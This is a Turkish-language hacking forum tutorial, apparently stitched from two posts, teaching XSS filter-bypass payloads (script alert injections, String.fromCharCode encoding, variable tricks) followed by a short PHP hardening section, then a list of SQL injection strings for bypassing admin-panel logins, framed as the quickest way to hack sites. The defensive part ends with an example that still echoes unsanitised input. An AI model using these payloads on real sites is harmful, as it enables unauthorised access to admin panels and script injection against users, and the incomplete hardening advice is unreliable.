Bölüm 6 - Filtreleme İşlemini ByPass Etmek
Çoğu sitede acık var gözükebilir ancak kod çalıştırmaz, bunu çözebilmek için bu bolumu iyi not edin. Filtreleme işlemini ByPass etmek için kullanılan bazı genel yöntemler;
’)alert(’xss’);
or
");alert(’xss’);
Bunlar açık olan bir serverda bu kodun <******>alert("xss")<!--******--> yaptığının aynısını yaparlar. Datayı onaylamadan önce Hexing yada base 64 encoding etmeyi deneyebilirsiniz.
Su hususa dikkat edin; xss’i test etmek için (“xss”) ikazı kullanmak hiç de iyi bir pratik yapma yöntemi değildir çünkü ben xss harflerini engelleyen sitelerin olduğunu biliyorum.
Filtrelemeyi bypass edebilmek için diğer yollar;
<****** type=text/javascript>alert("CyberWarrior")<!--******-->
<******>alert("CyberWarrior")<!--******-->;
<******>alert("CyberWarrior");<!--******-->
<******>alert("CyberWarrior"/)<!--******-->
<******>var var = 1; alert(var)<!--******-->
Bölüm 7 - İleri Seviye xss
Bu bolümde sağlam olan belli başlı yöntemleri inceleyeceğiz ki, kendimin bile daha kullanıldığına hiç rastlamadığım yöntemler, eminim beğeneceksiniz.
“Sihirli İşaretlerin” kullanıma acık olduğu ve bu nedenle bazı komutları gereksiz kılan birçok site gördüm. Ancak kesirli sayıları kullanarak onları ASCII’ye çeviren bir yönteme rastladım. Kesirli sayıları ASCII’ye çevirmek için gerekli fonksiyonları içeren bütün bir tabloyu
color=#2e6382Ascii Table - ASCII character codes and html, octal, hex and decimal chart conversion sitesinden edinebilirsiniz. Bu tablo size neyi yazmak istiyorsanız onu yazmanıza yardımcı olacaktır. Ben kendi örneğimde "turkishajan" yazacağım ve aşağıdakilerde bunun için gerekli kodlar;
67 121 98 101 114 87 97 114 114 105 111 114
Evet, şimdi string’imizin ondalık değerlerini elde ettik, bilmemiz gereken şey JavaScript’in bunu hangi fonksiyona dönüştürdüğüdür.
String.fromCharCode()
Bu kod bu tarz şeyler için uygundur, kurulumu kolaydır. Bunu da aşağıdaki kendi argümanlarımdan vereceğim.
String.fromCharCode(67, 121, 98, 101, 114, 87, 97, 114, 114, 105, 111, 114
)
Evet simdi
"String.fromCharCode(67, 121, 98, 101, 114, 87, 97, 114, 114, 105, 111, 114)"
“CyberWarrior” ifadesinin JAVA (ASCII)’deki seklidir.
Ve bunu uyarı vb şeylerle kullanmak için simgelere ihtiyacınız olmaz çünkü zaten bunun kendisi değişken olarak görev yapar.
<******>alert(String.fromCharCode(67, 121, 98, 101, 114, 87, 97, 114, 114, 105, 111, 114))<!--******-->
Şimdi bu durumda "CyberWarrior" seklinde gösterilecektir. Ve bu yöntem sihirli işaretler denilen imleçleri bypass etmede bir numaradır.
Bir sonraki bolüme devam etmeden önce, yine değişkenlerin kullanıldığı başka bir yöntemden daha bahsetmek istiyorum.
Söyle bir şey yazalım;
var myVar = 1
burada myVar 1 demenin daha uzun bir seklidir.
Değişkenleri xss’de kendi lehimize kullanmak için, aşağıdaki şekilde yazabiliriz;
<******>var myVar = 1; alert(myVar)<!--******-->
Burada değişkenlerin içerikleri herhangi bir işaret (quote) kullanmadan gösterilecektir.
Bölüm 8 - xss Güvenliği
Bu kısım web yazılımcıları için hazırlanmıştır. Hazırladığınız kodlara nasıl güvenlik sağlayabilirsiniz ondan bahsedeceğim.
Eğer ******’lerinizde xss açıklarına rastlarsanız, güvenliğini sağlamak çok basittir. Aşağıdaki koda söyle bir göz atın;
if(isset($_POST[’form’])){echo "" .$_POST[’form’]. "";}
Diyelim ki $_POST[’from’] değişkeni herhangi bir girdi kutucuğundan geliyordu ve sız de xss saldırısına maruz kaldınız. Sonraki ise bunun güvenliğini sağlamak için çok basit bir yöntem;
$charset=’UTF-8’; $data = htmlentities ($_POST[’form’], ENT_NOQUOTES, $charset);
if(isset($data)){echo "" .$data. "";}
Bu satır muhtemel tüm kodları alacak ve onları < gibi şeylere dönüştürerek çalışmaz hala getirecektir.
HTML girişlerini kullanırken herhangi bir farklılık göze çarpmayacak ();
Ayrıca çok yaygın olan başka bir fonksiyon daha var, striptags(), daha fazla bilgiyi php.net/striptags’da bulabilirsiniz. Tam sayı değişkenlerin (yanı içinde her zaman için tamsayı değeri bulunduran değişkenler) güvenliğini nasıl sağlayacağınıza dair size göstereceğim diğer bir yöntem de;
$this = $_GET[’id’];
echo "görüntülediğiniz" . $this . "blog";
Herkese Kolay Gelsin Beyler ! Bu konu da bu kadar dı sıkıntı olursa facebook grubumuzdan bana ulaşarak mesaj atabilirsiniz !
5- Bypass
Bypass en kolay ve en kısa yoldan site hacklemek için kullanılan bir sistemdir.
Admin panelindeki id ve şifre kısımlarını Bug'a sokarak panele girmemizi sağlar.
Kısaca Admin Ve Şifre Yerine Gelebilecek ve şifre Doğrulamasını Rahatlıkla Atlatabileceğiniz Bir Açık veya Bir Methot Diyebiliriz.
Nasıl Yapılır ?
Bunlardan Birini Admin ve Şifre Yerine Yazanız Yeterlidir.
' or ' 1=1
' or ' 1
' or '
'=' 'or'
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
İyi Forumlar
SXJOKRY İYİ GÜNLER DİLEMEK